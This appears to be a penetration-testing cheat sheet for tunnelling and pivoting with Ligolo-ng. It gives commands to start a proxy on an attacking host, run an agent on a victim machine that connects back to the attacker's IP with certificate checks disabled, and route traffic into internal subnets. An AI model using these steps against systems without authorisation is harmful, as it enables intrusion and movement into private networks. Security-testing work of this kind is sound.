Tunneling With Ligolo-Ng
Tunneling like a VPN
Description
I like to use Ligolo-ng for tunneling because it allows me to route traffic through an interface like a VPN instead of having to rely on a bunch of socks tunnels. It also works cross OS on both Linux and Windows and can be used in much the same way as a traditional C2 system, establishing sessions to victims and issuing commands. Ligolo-ng can be downloaded from Github and there is fairly extensive documentation found on the wiki.
The goal of this post is to essentially serve as a cheat sheet for the tool, providing the commands and scripts required to quickly and easily establish tunnels during engagements.
Commands
The commands below download the appropriate proxy server and agent files (make sure to use the same version and correct OS) then unzip the archives and give execute permissions to the linux server binary.
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_windows_amd64.zip;
wget -q https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz;
unzip ligolo-ng_agent_0.6.2_windows_amd64.zip;
tar xvf ligolo-ng_proxy_0.6.2_linux_amd64.tar.gz;
chmod +x proxyNext the Ligolo-ng server must be started on the attacking host.
sudo ./proxy -selfcertCopy the Ligolo-ng agent to victim machine and run it to establish a connection.
.\agent.exe -connect <kaliIP>:11601 -ignore-certCatch the created session and join it. Then create an interface and start the tunnel.
session
1
interface_create --name ligolo
tunnel_start --tun ligoloLastly, add a route(s) to the subnet(s) we are trying to reach, specify dev for device and then pass the name of the interface we created in Ligolo-ng.
sudo ip route add <subnet>/24 dev ligoloNow a proxy tunnel should be correctly set up that will route all traffic destined for the subnet specified through Liogolo-ng and the victim machine.
Last updated